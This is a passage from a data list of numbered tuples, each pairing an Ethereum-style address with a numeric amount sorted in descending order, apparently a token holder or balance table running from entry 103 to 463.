(103, '0x257d13eb0651843fbfd880754794f50ceaf4ce0c', 6860.91934523),
(104, '0x312deeef09e8a8bbc4a6ce2b3fcb395813be09df', 6836.0),
(105, '0xef6f4d006c30bed47b705e7ac6767c28ee58e972', 6830.0),
(106, '0x77726c5a3dff708356aa355488b69eebd8490453', 6829.50220028),
(107, '0x857d796d9D47E50D73636348C4D22486Cf9F443f', 6765.16815795),
(108, '0x4dacba56b747b379b90c19bd751b5643e6ccf9f8', 6707.64822341),
(109, '0x7a47501cba5d028f374c4839329896f2ab4309c2', 6677.08072858),
(110, '0x5f1d47144121163999ab22813702041e1b6bc35b', 6626.43),
(111, '0x9d573aaed110bf68f2cadd91debf964ef788b342', 6571.97879852),
(112, '0x284c78734d21e76015befd12c9594e06854257a1', 6416.0),
(113, '0xcced6ce6fb65a1a82721c0d687a836c17f17bc55', 6176.0),
(114, '0x72872d7cdbee062e01441b5e43cd0decd1100574', 6168.0),
(115, '0x9f18cf7439a0a6d834f01fdd21643e91ca5c5eb2', 6010.0304766),
(116, '0x7ea4e9688414b15bbd8078d92967bb6b80704ccc', 5972.83028932),
(117, '0x14d9d3480b8f987e6c4bfd3417ef10b72097e021', 5956.78471883),
(118, '0xA3015196301963865e4df2ad681A7817C8Ff055a', 5850.0),
(119, '0xe4bfd3bf03439ca715899daa5ca7b48a2244b67f', 5776.0),
(120, '0x0486f20c14872c2d6cf2bf271167d344f3b4bd4c', 5751.15238763),
(121, '0x432a1671e5e2539d2fe2e76820b6a2192ba9bd00', 5727.793),
(122, '0xb71d443730426450f59981a3ed0eb1d5050c36d3', 5654.29266344),
(123, '0x385eb183223aaf5cda6022f6ed26faac1e3c0a47', 5485.0),
(124, '0x3a0d1c0b3552ee27cd4ade9683a21ec7b8537e59', 5462.04204858),
(125, '0x656038e97cee7c095673f7b9fad695b323a6f098', 5340.41193389),
(126, '0xc16ccac44cbf7a75d8dfa421d6a58332fcf98bd5', 5316.75),
(127, '0x14fcfd34f3c88289efde9f6ce3f39dade2ca91bd', 5290.41210963),
(128, '0xda83016373468648af9a38478dfbff176beaf0d6', 5275.99843724),
(129, '0xb98d2fc4552cf933b088929264bcc70746205b0c', 5232.03126159),
(130, '0x0237e36334bd27fa7344425005a036a4d9c3dea0', 5200.00054061),
(131, '0x8ab718d4b547a364c654ec024e13729ca725f458', 5149.86345906),
(132, '0xc573c359fb77fd26f9107e3969674364315bb0a0', 5085.0),
(133, '0xbd44b36ad14e7f49c20ba32128b6136ad63521be', 5085.0),
(134, '0x9dc446bf12c392e82862d564a6b3dd4adcb65d4f', 5085.0),
(135, '0xa5d687fdcab26e0e6451cfa1dd2353fa3efb7e53', 5085.0),
(136, '0x548c7a27c33f3e1d59fd9ee97b7d56a2e4a5139d', 5075.0),
(137, '0x43ccdf5edcfc63536d2e2e67ec8b89130358574c', 5013.9503012),
(138, '0x78ec2ba16fe5bbb08669c0f4328f455f514a3dd7', 5000.13064704),
(139, '0x2dd3ce6d874ae68f041db2cd38b29cf83e0eb677', 5000.0),
(140, '0xc8efac168037fffe390cbc45e3ab12a47df7fd71', 5000.0),
(141, '0x61385f4c311f689921b854ba500ffe7f4a9c2e45', 5000.0),
(142, '0x6da4ec022e70c79b6681724690c715a8482c6669', 5000.0),
(143, '0xb3b735e53f9e76e111e6c7e65154216fcc7cce87', 5000.0),
(144, '0x158136112d8a2c70d3b60c4075a9dc30372e563c', 5000.0),
(145, '0x933e7970b0cb7ecffded4e15a33a979e36853d0c', 5000.0),
(146, '0x52148dfb0546e28a50c5f4308cf8646d695ad51f', 5000.0),
(147, '0x92ad3e907e7e4a160a551ae142eca634cbabfde4', 4999.99951122),
(148, '0xbb5dc8b678cd40a201aa39e3ebf19266c5b03062', 4960.37681654),
(149, '0x040c816cc9def641465fc784d9dbc492cf4d6ec6', 4899.77587528),
(150, '0x709e214D05c5F9e2cE8254B098C3ca8393090584', 4885.33492083),
(151, '0x3da339f504f182efd913d883e03c347b66c980a3', 4810.83821607),
(152, '0xbd4ae0dc3c0fa45e0119d3c108acde1dad5e7825', 4750.105681),
(153, '0x1b57b6fc5c0c0008168ff651ebc9441a84ecb860', 4730.0),
(154, '0x1cd84ab8312475aa387260c0a1c8c9ecfd790832', 4518.36964449),
(155, '0x60b96ddb82de510d8f36f4cc50f158db10b7b7cb', 4487.0),
(156, '0x3816fa4097d6a44e3f66c520b4bacc0bc9a6b78e', 4302.23284712),
(157, '0xaa754059e27d36c70a9f3c20646071c52e364809', 4219.36516939),
(158, '0x5934e70499138a78c96a9546e8dc87c8c0e900b4', 4150.0),
(159, '0xa9f3304c9b8e79bab8448f2881d9877f9a022fa9', 4141.53860996),
(160, '0x3d5a9e766ceb574b05b6f4ee4f55cffa174a0cbd', 4093.61159045),
(161, '0x1941838444d15b9d3d9b46c0879ea5d632997522', 4076.0),
(162, '0x318ec61f4afcb385e3544acc11206db3a0e6b92a', 4055.93645378),
(163, '0xe4417510005f849bb4fdce2836d4bfbdd5f11b0b', 4008.0),
(164, '0xc82c179beddcf474fd19394c174b2fdb0222e971', 4000.0),
(165, '0x6fee393fcaa84833fd41de8b34e6a47f954e41da', 4000.0),
(166, '0x8533a0bd9310eb63e7cc8e1116c18a3d67b1976a', 3999.4),
(167, '0x76b57f58784280e00dff14d03b97d96744cfd04f', 3967.85025701),
(168, '0xe42e4b61797f148e6da859b83de7064d33f4012a', 3885.24849943),
(169, '0xe0261acfdd10508c75b6a60b1534c8386c4daa52', 3810.80232407),
(170, '0x7441bdaae80b6c09d132f7f9390d09fc3591c813', 3752.52769437),
(171, '0x138dd537d56f2f2761a6fc0a2a0ace67d55480fe', 3687.33887359),
(172, '0x09809ddeff19fe0a61b65cb7890cba6809f6ab50', 3654.19389386),
(173, '0x4168cdba17e697302199803310a08fc3a0871e14', 3634.0),
(174, '0x39764ed873f61c47edd8a3cc80b5455136506a51', 3631.38418396),
(175, '0x1d6ef6ca844483e38994e043c917715c986d26a4', 3611.03570881),
(176, '0x0eccf3295b5dfcfce69044ea157d55dfd0f0b955', 3524.82062045),
(177, '0xd36b4fdd2d99af20cb0dc335f48db986a143ac94', 3516.0),
(178, '0x1d0e1068c52ee39f69622f80acce180003842657', 3403.2027711),
(179, '0x24274060c5aa0587fa0c8f11f705b34645afbc01', 3386.5),
(180, '0xdbfa7b76b9da25a2f5c403e87d3e4f5a539587cb', 3341.227),
(181, '0xb9c53e90ad0d2acfe5b5803ca7af30ba3ed695a0', 3289.32981124),
(182, '0xb8ffb57e772276233c57d1d34c9b99457b51575f', 3273.45),
(183, '0x1d1b62da8d1527adc29421b1989652661972ea5f', 3250.99796437),
(184, '0x8b8f50386542bb72e3c16b57c49d146c195caf90', 3181.52002779),
(185, '0x3757e81f5709c08fb073047a6b28a367b110c727', 3167.02032925),
(186, '0xcb31565a57cf802fef41d97cf292976087bfc2a9', 3158.59054137),
(187, '0xc9a1c3e1b638f1172a8ef0129cb50dcfa36e168c', 3120.69931027),
(188, '0x6def006ca0ad75b535602f11de830b84aae610a2', 3106.10781353),
(189, '0x7e7e2bf7edc52322ee1d251432c248693ecd9e0f', 3091.78022543),
(190, '0x9a4c9afe74d5b84f3f2a49a7c4b98788a4a397b4', 3030.0),
(191, '0xaa4dce781266c9c55979add1021289de2db78d80', 3001.33532453),
(192, '0x495454430db6e8a503c419aa76a5d9d924b308df', 3000.0),
(193, '0x57a6ec3f48c4075bd3ee6e0dec520bca2a9b7ac8', 3000.0),
(194, '0x377e751d86ba9a187019a26ab3aa2d0240f0c788', 3000.0),
(195, '0xc9a7dd1973b569fe042ec5785689bf243e362f55', 2999.99987797),
(196, '0xd74186f70fa7f7c11c90eda9098be989d542bc97', 2994.7652797),
(197, '0x8bc9bea87871ee3aab5b2c05aaadcb322b43b345', 2989.12407997),
(198, '0x0685a9a7f425b6e2ea37b83b53bed9ef9c498cb0', 2950.55507271),
(199, '0xabc3b0796629973221efa382d947cfb1b9dc75b6', 2950.0),
(200, '0xa388585123f7065cbdbd51745d3546ddf98bfea7', 2931.23666557),
(201, '0x672f826e7d165233ca56c42222f00669b7f66e2f', 2923.98834233),
(202, '0xdd1f8d7fe5032bd228296283f7c4d6299f15bee4', 2900.0),
(203, '0x21749e24ea7816e0a98d716d2783ad467e8a32d5', 2874.70868204),
(204, '0x204b63c632c623d10f6286b2c445429974afc738', 2822.38570794),
(205, '0x39caa5e5109934b63f338f14d93d13ee1b005e10', 2799.08946054),
(206, '0x0d32cbedf2cbdfbfcb4ed5c8498025909dc15515', 2795.90478382),
(207, '0xc9b5f4f55c2cf976b7614c3efa612d02ca303852', 2765.0),
(208, '0x84d96968235a6a60d4f7bfaa77112bcf02e739ca', 2709.18115913),
(209, '0x508cacb166ee3b304252c624efd5448806809d8b', 2700.1061071),
(210, '0x68a4693a011d0b9e81e70fe4e0a98d75a243bfd3', 2700.0),
(211, '0x8ab316245834d9486a250e72e62bdd92b246e5cf', 2660.37025614),
(212, '0x7132c9f36abe62eab74cdfdd08c154c9ae45691b', 2650.0),
(213, '0xee658666344cc57da9c7d5fd569dba0f19b771a8', 2646.81153058),
(214, '0xd50cc43c038a9b5a8123a7edb4bdccd47bf95487', 2643.48408839),
(215, '0x6941f1db178b46ceb547c724394da63f2b351463', 2639.817),
(216, '0xad9f11d1dd6d202243473a0cdae606308ab243b4', 2622.00736585),
(217, '0xf6d0c445f9b8894cacc7a4c1a222ba29d665261e', 2613.41195233),
(218, '0xb5647a8d2914a85886077d90f8adb7e0046d4d19', 2600.0),
(219, '0xb5b9f370da828feb7115226e57387309c2b497d8', 2565.35449369),
(220, '0xbfc8b31da13a14b1e620e8068f57fd464915c5a4', 2555.44168798),
(221, '0xe6e89ac4cb1ff0760bb5d8e8e102e19313cfed3a', 2534.9),
(222, '0x069caffd302b6df7847f1981d8df293130e3d88f', 2531.17676701),
(223, '0xed26aa6c349e7e160a20c2e18e507ff0a65e16c5', 2520.40118203),
(224, '0xb2dbfe83f4d2cb3259b59f7b37daa5b863bd4c1f', 2503.39514564),
(225, '0xedea79af2fc57373179a2b70d5aac397d4bf571d', 2500.0),
(226, '0x3f5ea9bc419b53ac1bef6a295237e8095278dbf0', 2482.03676885),
(227, '0xfee214ef3d5add3b0c1380c19871fb8e8c311291', 2437.309496),
(228, '0xfc3318c9f21a37043de661142e461f8badd0ab8a', 2435.46327425),
(229, '0x31d27085e20a0f41b18bd1ffd8c2821f14ed07e9', 2400.0),
(230, '0xe988d96a2d431f3a0ca94f9fcb26208e16d1dc40', 2400.0),
(231, '0x6c77195e75a212bf0be93fefe429bc0c2a51a0c9', 2383.76),
(232, '0x42982716d6061dc53c15357396d74ce7eeab65d6', 2373.008),
(233, '0x9268cf67e213209e5c786777d45569e9dbc27bad', 2355.388),
(234, '0x525f94485486b506fe2db50e815d4eb95fb54cef', 2344.8048063),
(235, '0x10faf5c2f24902c70f84d8d0ba5c27a3a3d0f5ef', 2334.5371926),
(236, '0x654be9db579fb3bc3181cac6b615596138816128', 2300.06329373),
(237, '0x506f1823ba9684129b93e8b7fc98798a2e9248f2', 2291.05307575),
(238, '0x6179dc12608597198454591f0b6dba2000279ff2', 2289.160542),
(239, '0xbdcdbc4a5c0bea0449268fd31950475bad8be59e', 2283.98124258),
(240, '0x59d63178eb1d9f1a0472d6297c9da4f655e0e3bc', 2229.5221913),
(241, '0x69155bf4fa9820cc7f6b8081f9ffc0df714bb8e3', 2224.35286567),
(242, '0xca5e1903211a4eec7c20902ca1d96da20e8b7c0d', 2221.99952452),
(243, '0x0910d57ad1d9d537bbebf589d1dd2e19571c716e', 2167.36519397),
(244, '0xfff72ee0dba7b9f8027cfe7bfed3f773d872f2fc', 2161.32636643),
(245, '0xcfed8d831d5c1c674726999377823891ba8a7bae', 2150.0),
(246, '0x20fd3a40e78957c8903370c57bb51f113d7cd897', 2145.75589949),
(247, '0x15b716564468a22f109667a6f61fdb83954d0de2', 2098.56395832),
(248, '0xcf196825f25866fa3a53153b76f3399bdfcd1dad', 2024.00991565),
(249, '0xd1c12add513c305067508b2f690916ea67dc2338', 2005.12178476),
(250, '0x5aa30e508d3dbb6ff7e7a81bdcbcdbfbd6877679', 2004.93770793),
(251, '0x3be0c1fcacf5ca5ceb8324323555845bb17eb99d', 2002.80680229),
(252, '0x15105e0c857bfcd85971afe99bcb4f2390475c89', 2000.0),
(253, '0x7b1407b9482b06a5c05f798bef36889394a69e62', 2000.0),
(254, '0x6dcd2776db668212e6f3a9707811429ee0410d1e', 2000.0),
(255, '0x953b70eb266c83c58c00636af28c7c1143f8a518', 1999.99999977),
(256, '0xfa5f9becd2da45c81a8e3b08fb337a19edeb54b6', 1999.0),
(257, '0x08b0a627bf0239aba77f4c9687fcd296e649ee34', 1975.0),
(258, '0xa8bb0426560742705a744a1146c7aba588a1cde5', 1966.18961984),
(259, '0xb852a5f9b6e9c5e10ac2dce88530d465f33feb2f', 1950.0),
(260, '0x65d5f8e9d6a43ceeef0472a684b6bf78ab8ef56e', 1928.37843171),
(261, '0x4398b458c8d1e57453fa73fea36cf6e0d3105aa9', 1926.267066),
(262, '0x8791091ada8a737f2c3347987770acf416ad282e', 1915.0),
(263, '0xab6f2eaf6ed336ec2bb7390364f104cd9941ed50', 1881.475),
(264, '0x6556bc79ca5ef2eaf44e5b4edaf932a6b6ed350c', 1879.48042539),
(265, '0x06d19010f1e104ab812de0bcfaee291ee5214b5f', 1857.68837241),
(266, '0x792da967bcb65933e3a4d09096142692159e06c3', 1851.10916332),
(267, '0xd6dd81eec61100e25b31a1ee8726e14d72673f82', 1845.60913995),
(268, '0xbed23b3be2706c792612516452222ead9a83ce7c', 1844.31292029),
(269, '0xd37ad3222c1042d3cc919f87e2edea9db3917c10', 1826.70428487),
(270, '0x530d92dfb5caa11347f26ee741910dee6eed3208', 1816.01620561),
(271, '0x73d0db3a1af5fae63ecec7515af0b13b2fc80e45', 1801.316471),
(272, '0x5cd7c6de1c486ecc07cabc09298e801021d55b87', 1800.0),
(273, '0x4ca9511af821bee15015898caa03c38d4834d515', 1750.17011496),
(274, '0x68a3e00c8efbf8c07392116e2c171788f8d8be8a', 1749.75),
(275, '0xbdbda14a6a4240f968c5abf54254ee3e8f13da5c', 1736.50016153),
(276, '0x82dd6d3a2a0790bab2348a3b3cbc1842ef704ef6', 1727.09337617),
(277, '0xbe6acc2382211fade80a0aaf53bc11671cf19db6', 1725.52675776),
(278, '0xb9a7440e9b68ec64cae8bca150af04f6449cce84', 1725.28837675),
(279, '0xb04915709cfb68da5cb82f23e8b6d8fdaa21725c', 1717.84971085),
(280, '0xf51fa6166221b1f5dabcd175e08da127fa774c65', 1702.67264363),
(281, '0x56b225130564e15724b7135ce7263582ee368fa7', 1700.91636396),
(282, '0x33a3491f0bd8b800034994c1ea8d8b9728d0cf4a', 1698.19226687),
(283, '0xd95c23b49a85996a0e9e5e6d8449de5dbaacb3e8', 1697.1678156),
(284, '0x2895730bd3725084c91a07f25786baac644851a2', 1691.06846962),
(285, '0x6dcd449bd5fa61eaf835da90e60e36a059643998', 1683.91614566),
(286, '0xe138b6ad806364709fee8ecf02cfb2050aea6e17', 1655.46380636),
(287, '0xfc88677dfa4522e13847f3fc098884b31c870f34', 1653.37038108),
(288, '0xcb9c41f06333ce619b1350278dd9fab8c32d9548', 1633.38767837),
(289, '0xebd76aa221968b8ba9cdd6e6b4dbb889140088a3', 1622.36750214),
(290, '0xd1e1cb24961d43d6cc25dc001b6332d6fa67888c', 1613.72192066),
(291, '0x1fb5ab02b67be98f78506dc3f9de32c81a447307', 1602.27),
(292, '0x56f1d6d5e77661e1ca10d270f6c8d4ec45ceea7e', 1601.39211002),
(293, '0xc47a0a1b2ac098b6453869389e7c8471d9d88b37', 1600.29479316),
(294, '0x3906842e00abf96cc58300bec49124e6a36a46db', 1600.0),
(295, '0xe75ea07e4b90e46e13c37644138aa99ec69020ae', 1586.63167658),
(296, '0xfcd6a571fbd33582fa48b032352675221f92b88b', 1580.0),
(297, '0x5f17f1fae4b77da30a4eade968eb8b88396bc8e0', 1554.0),
(298, '0x868d6c0f9fe68061d5105937d1296b5725c00546', 1550.55642318),
(299, '0x8d2a9cc676553cfc007311b85ffc7c7957ffc33d', 1550.0),
(300, '0xf8daf929660d3548c80f3e81c9ab5b5122a5fb1e', 1546.21607696),
(301, '0x7381d09a8bde146c2472500203fd924fac0669a9', 1543.0),
(302, '0x293be9563bffcd50bbc29b8d87fc5c54f90732e1', 1507.77648525),
(303, '0xd65d33ba85f81c7c580195bc52672754ff3e202a', 1500.58293793),
(304, '0xfcddbc6fe38d609fab54f5f1ea8de7f710382aff', 1500.13168187),
(305, '0x390365cef67dae207db323496d24f643dd3ae581', 1500.0),
(306, '0x810e096dda9ae3ae2b55a9c45068f9fe8eeea6db', 1500.0),
(307, '0xeed22a02b5802b3b0187c221a87186a9450f2f89', 1498.0),
(308, '0x54f8f9ed083ad1256012984fc9c3319830d2668d', 1494.64856757),
(309, '0x06b5fdeba75494506c2d42aae1fc6afaefb094b5', 1490.66773821),
(310, '0x10e482d9fbc7ce353aa442444d25891a42c9626d', 1490.08776836),
(311, '0x7fb0115a09ec231d7d78440db52e5a1779116496', 1469.33957319),
(312, '0x55dd9b279dd99a95d763f9f5558abd5c9e9096c2', 1464.51379448),
(313, '0xf76350a77a2b2a34395d3f50dd5c1f4ea2e7d6da', 1461.22126967),
(314, '0x99a8220874c0ca868eb628b92be11375ccef11d8', 1455.54228512),
(315, '0x213c861bd0f02b1d10bdccf228bee18c124a77a2', 1450.61338788),
(316, '0xb746aed479f18287dc8fc202fe06f25f1a0a60ae', 1450.0),
(317, '0xca13b8e623bab51513c87089dc0a43b8fc1c4733', 1445.32585509),
(318, '0x09d9421452602b6dd20865578c7c455d97b28fc5', 1440.87683665),
(319, '0x093a3eb5c54722ccbb2cfbffcdb5b63c82f24218', 1433.89014314),
(320, '0xbc60aa031a9f34bd7992c99eae5e2c4dd1b5dbc3', 1416.48668057),
(321, '0x8cc179fb0473fb6473a2e28b290c79a06e39db2d', 1413.0),
(322, '0x6cbf9051661319a7717813a7d0cd23b969ba40dc', 1400.0),
(323, '0x7c2583ba2d3867ae5e02acbc099715479f18b144', 1396.69980583),
(324, '0x63302690155cf9c2714e9a1631e3ed140ed2fb7d', 1390.82022925),
(325, '0x9e1b48c6943e54871b244f097aaf0d13f6a64060', 1388.32146311),
(326, '0x98b155d9a42791ce475acc336ae348a72b2e8714', 1380.97285537),
(327, '0x3e000c703517e6c4abc0e8f469f2b671936325cc', 1368.21083585),
(328, '0x9567be7ca71b0f5a0a9aa1ecb943b60a00a98398', 1358.00456328),
(329, '0x9b3862c03f57b0ad4909937664d7bdef2ef4b33c', 1350.0),
(330, '0x01612d2e5ccae8e588d476bd09df7185cdf4f7e4', 1348.08),
(331, '0x603aa0ebe2fcef3fadee43cc1d949a583db8f185', 1340.09282961),
(332, '0x61213ddd3cc0fba8ac431351cf9f2103ab74fd8e', 1331.55),
(333, '0x47ddaafb9c8d72c44e0e4278b57a22ba7494e81a', 1325.42781379),
(334, '0xecedc580bb05e2399cb4f8aa53b4649fbce3dceb', 1312.995),
(335, '0x50c95c94bb5fa3aa2f5b340fe6ac02ac6224cea7', 1310.68876988),
(336, '0xc3fe157d4ab849cc9b321060169ba6a81f0a152e', 1309.66025939),
(337, '0xce0a7a2797fa84fc21ef114e82c84fe4ef7489f4', 1300.68854926),
(338, '0xa1aa3b553710b4b2ccdcc9b0cb07bb59a89fd000', 1285.04660069),
(339, '0x5c869c7bf5e3836b7d4ffff67eba5be9b84ec723', 1284.0565207),
(340, '0xf8f19bd1555392f1db4dd2588e68b671e5e17b1a', 1277.7834617),
(341, '0xe55f19d6eb88ce99181e70b823cd4470e8e6df62', 1275.91903769),
(342, '0xff09a75c527e2b327fac9594327884637778755a', 1273.15915947),
(343, '0x5abe7331334997770ac5d2be3d016d70bbb0ae73', 1269.87491481),
(344, '0x38a6a3f769857cb6db04406d9f6c9604ee8e54df', 1263.48673227),
(345, '0x5658e10bd669a89e03b7ac8dfe38b2af613b3818', 1261.0),
(346, '0x77ba6b59e27dff8fac459b6481b835c268898ef6', 1254.10509008),
(347, '0x5687de7f326f79a420fb0aeed2e239e7b29372ee', 1251.4987195),
(348, '0x3584efbb3dab1d249c635e53305b1fba77c723a5', 1241.78399261),
(349, '0x61b51970ff5164d42d797a4972bdd64dcd09ea17', 1221.30997563),
(350, '0xb093ecd91d6be5e2e280cd713509db10cbaa390c', 1215.49624202),
(351, '0x8f7501ddac037bdb19d996f22cd8891a44ff0e08', 1196.21050424),
(352, '0x44fcbc53d0fa5d0b0fb7c03056348f8582b3ef8e', 1194.61318781),
(353, '0x2a61cef0c52492d4c50b75ab50f65e649246c986', 1192.1801945),
(354, '0x1c5af82a5edf00a66e1308a365808f353cb264c3', 1190.20679198),
(355, '0xd28e65a2fd9166cbbcbf8d9225d33f1bdba5fc3a', 1189.80592373),
(356, '0x88b54cade5ee85a671c2b7d8cc6cb1e88ceac4d4', 1187.33296808),
(357, '0xf02158a00e9fdea27503402ced89f871be60fc4a', 1185.80960114),
(358, '0xd4fb8d6000dc4f9520c53822f652ccf9efb5aa76', 1183.0),
(359, '0x0c1add8e9a6d613f814c3a9b2b8e276652bf5383', 1182.82461829),
(360, '0xc5715394eecfb103aacba9b7db27f0fd3676721e', 1182.548),
(361, '0x22b39f83bcca76bbb288633fed196c2a05c23e7b', 1176.35664434),
(362, '0xb04adc19e5cf482b0ff8d32fc798737f172363ae', 1159.27356219),
(363, '0x274f3c32c90517975e29dfc209a23f315c1e5fc7', 1158.9321709),
(364, '0xd5cc561b312f155331c320380be2d2e1dc798cb1', 1154.89779421),
(365, '0x4fd5a56ffb130665bf6b0f41651a8976c1eb8c26', 1151.99985887),
(366, '0x08168b5b9e621d5c3fd7aa60537afaff77c5b365', 1151.48671892),
(367, '0xfbea6ec73eb8554326e950ab49aa7462db6eddd9', 1150.0),
(368, '0xc969a64be22f2b2fa4cacd3b824f47a029ee98d0', 1140.72247116),
(369, '0xe1c608ae303c8ebb40ecfb2f3ca4341d21ed76b0', 1138.54563814),
(370, '0x2674ef196c99c4b0119aaa063c6e82d6ac11d2ab', 1135.69664585),
(371, '0xec8af40445f6d4169b75623854350c7711f47ec3', 1126.3566419),
(372, '0x66ad1860361ab922e589488bbd250abbb0f793ab', 1124.68251639),
(373, '0x3fb27837240742b813801ba1405a1ab196896ace', 1124.44081731),
(374, '0xe1fbc646c5de68b41433c8da96f03bfed9a05f2b', 1112.03077119),
(375, '0x2cf58eeb9369ca0d1ca2690d057661514a84ef91', 1105.62362963),
(376, '0x9b5f8600ab412717fffb026c24af311ab0bc6e75', 1100.23949262),
(377, '0xe6e27f75a13307c3fe4a8d45c09de9c311eea4a4', 1100.0),
(378, '0x0dde2e438d72e54c8d2e81f1bf51f42646e6c467', 1077.47582494),
(379, '0x97be37418a0037c88df512760d8ab0c795217b37', 1072.52035127),
(380, '0x8bcba7e64f9ab002c765cff2a291a85a8c8837a0', 1070.914),
(381, '0x19a668540a39cf9bc6b6809be129f57984a0d2b0', 1070.08449403),
(382, '0x1d0e97dbe5bfb1ecaa0529fb7be550962f00aef8', 1053.24294112),
(383, '0x35d28772130c325403b5ed3cc591368f3baa8250', 1052.17580722),
(384, '0x2d7fb51a4fd377c119083c6dbeec6215f752487b', 1050.46960767),
(385, '0x3397546a133d33550a74c53e0bf9e187a6c1e2b9', 1032.4988451),
(386, '0x688caee63356db8d64b50ebacb65998e97c1a15b', 1032.31614615),
(387, '0xa534eb5d9258daf68aa938bfb0b5a6ad65a812dc', 1031.69265859),
(388, '0x9be96a6e861d2e5aff1fe0738bed664b6f0b543e', 1024.14448507),
(389, '0x57e2f7931928f06e576917ee135f382582ddb731', 1018.14571107),
(390, '0xef9b6304358ebb1d9c1ea479d863b43715301fcc', 1008.4108162),
(391, '0xfa3f6eccc6b48844a5d0e2d7b754e015c2cc1b8a', 1007.96372283),
(392, '0xe8a01b61f80130aefda985ee2e9c6899a57a17c8', 1007.41108173),
(393, '0x616e67e07435114696c6b7c9ff9ba2122017334e', 1001.25233091),
(394, '0x6445661084dfeec1d5367a6891f9e0eed72e5a40', 1000.0),
(395, '0xe1b5547977ad0e06b8fcd12ca7a6b14ebb264cba', 1000.0),
(396, '0xc890e1af5d52454a43ff7b65b0353b7425d6eec9', 1000.0),
(397, '0x7e1187fe78e404f1bc531a9776ae452efdb6dbfa', 1000.0),
(398, '0x86024750f069e7d38284d367dd6180c73151b9bc', 1000.0),
(399, '0xd7361740d623eef4c0b2be8ce17bedaf476860ab', 1000.0),
(400, '0x458De35E5bC76802862DA179767f48425944AaeB', 1000.0),
(401, '0x3dd55914bbab532bc0f797201a77b786f1f6fde8', 1000.0),
(402, '0x6bbe0a39d7d6911eb2e8bd57dcea2344d05baa19', 994.0),
(403, '0x70580ea14d98a53fd59376dc7e959f4a6129bb9b', 988.40803497),
(404, '0xe067573b0b00627fe21492f1b95e7955a482aa7a', 986.8),
(405, '0x933461c58998b5d272c66dff610abb0a7d335447', 985.0),
(406, '0x41319357e1abac14c7012626ab01992ffda57123', 980.53647924),
(407, '0x7ee86965a28f97857a8ce915f93c5aafc191588c', 967.554866),
(408, '0x311f42c91c710fa522d1edd282be431eac20113b', 962.5),
(409, '0x725ee6748639e6d49b46b7e2da358dc1f20a010f', 958.25583919),
(410, '0x3c132698d59927fe08cba433a41d08acc96c0edd', 950.36781379),
(411, '0x97eae5fd11d07f69bd36063f642ddd060dcf7b51', 948.11811858),
(412, '0xf9d4f18d1f8340921892e0cd9e6a9947bf586f06', 940.72920978),
(413, '0xee2a7b2c72217f6ebf0401dabb407c7a600d910f', 940.34195038),
(414, '0x191a2c442ce9687d8a297fe6ba474397eba4cbae', 939.58990534),
(415, '0x55e0fc46f8e5c31ad0bebcc74120d96cc3a9d049', 934.69),
(416, '0x312bebd03d86b9e51243fd6da8fe6856b8c3f125', 934.26340081),
(417, '0x66fced227cc9d1d9d8249fa3057a20e0eec5fa0c', 927.34181089),
(418, '0x1490afd73d6004484be7211715ea3efed9c2edf5', 918.78346583),
(419, '0xf0eeb3e983f68de2e6209065e7209521c6ca914b', 915.87382944),
(420, '0xbaacd4089f6199c2e7c8dc2887acd0b2cd2a408b', 910.78),
(421, '0x9f76deaaa948386cb2beb34ce01128c8e462eddd', 908.976346),
(422, '0x2c04ca26541eac234ca93d6fc0ff788fbd553066', 903.23413052),
(423, '0x7aa4296dd40093c232afb86630d4765b17a765e2', 899.99999998),
(424, '0x521b9f95e5b95c728e0f10dee1ad230682fe675a', 898.02948621),
(425, '0xd756d5567939745f79dc85b45f8bc4d59351db7f', 897.77),
(426, '0x90c0c5a1ece301f60b597de995f4438f3a3a48b5', 896.82957604),
(427, '0x97c469d23005d6f2633e55d157b8510132e4bf4a', 892.937),
(428, '0x9e2ed055bbf95ee42e7973975b9ee6561ce1354b', 891.93979603),
(429, '0x487b1a73012131818a9da18bf6f0d0fdf8ba1ffa', 888.91),
(430, '0x67165e1ea2002cd7cbb4df93e5a855ef3678712a', 886.50041915),
(431, '0xafaf9a165408737e11191393fe695c1ebc7a5429', 885.88612106),
(432, '0x7348ccd3e09f0bdd520afd7adf155e241ad4e1df', 875.10019123),
(433, '0xca2dd7616c04eae77465fb6f61ec5ef260ce6ae6', 873.40177645),
(434, '0xd2109241b164f49d0ecf8395ade96223abf611ac', 863.0),
(435, '0x79c5be8f4098208006c7940cf72dae71738b39b6', 861.46959019),
(436, '0x36efb17c234b47ec36be7402e0b8d7118ada550b', 860.74113538),
(437, '0x724c96cd00fd39da96b20b5ed8e6d628b690777e', 858.68870428),
(438, '0xdc7822ebbb7cc2d4ddae107ffe6b283df95a4c5d', 854.62047525),
(439, '0x12e24c2a9cbeaa80c5d7d7392ce70a056c2ebf90', 850.0),
(440, '0x363b5534fb8b5f615583c7329c9ca8ce6edaf6e6', 844.13404152),
(441, '0x8bd56a65149fefb254cdfa93a23cdc81608ff52a', 838.20801908),
(442, '0x0a758f9aaa89bd3a9d0d60303c704d81d4a68fcd', 835.58058245),
(443, '0x669124e9d08fd73bfc77430d196674421da59814', 832.25782529),
(444, '0xd8724afa95ec4eab1c2b7698af4c7c2647c8d445', 825.0),
(445, '0x68b516f10bd2e9b7c8d49c326a49e63d3f87ac53', 821.00794765),
(446, '0xdfaaa0e14b3326ef71aa2974952604b240e29683', 812.9298424),
(447, '0xc7558592a9abc27ce8e4572ea2ac7fee3682f4d1', 803.05886089),
(448, '0x492c2bab4c0aaa42b820028baf20931d61607244', 797.90513261),
(449, '0xdaa5a23321796eefb563bd6a970c1695cc1af22a', 797.25939834),
(450, '0xcf3c6af794693ed19104016a20b46405e9bfb9e7', 793.4304838),
(451, '0x9be48b877aa1d6f8c7616671c0c99f18155ea0e4', 793.28410304),
(452, '0x717b76ad962ab4c3fbe9c376060ae079b8e355fe', 789.87344133),
(453, '0xd0214b7e8a7821a5cb07024bc00d64ece8cc1067', 788.64463628),
(454, '0x3171e2f0a9bcba8c33895c84f22629dfa8de6d2a', 785.0),
(455, '0xc5b2c6f19fc6626f0257c85e4ccbf22702e624c4', 783.0),
(456, '0x1745f31f9dadd71b9033b46e5050ad1575405905', 779.40761839),
(457, '0x67ad01635b268e2407d467102f860ea262b91617', 772.87063854),
(458, '0x988251c12d6db307c1a9e93280d90b98215f585b', 748.0),
(459, '0x9172ff7884cefed19327adace9c470ef1796105c', 744.88710544),
(460, '0x9303b501e06aded924b038278ec70fe115260e28', 738.55971585),
(461, '0xa0c99817b63eabbd84ef35834efb8f087889f36a', 737.52321008),
(462, '0x65aebe262fd644fa5ad3d45f7910732b413f81a6', 732.04571428),
(463, '0xb9307de3a136c00b6e6980dfe4638df30f6df1f8', 713.8557364),
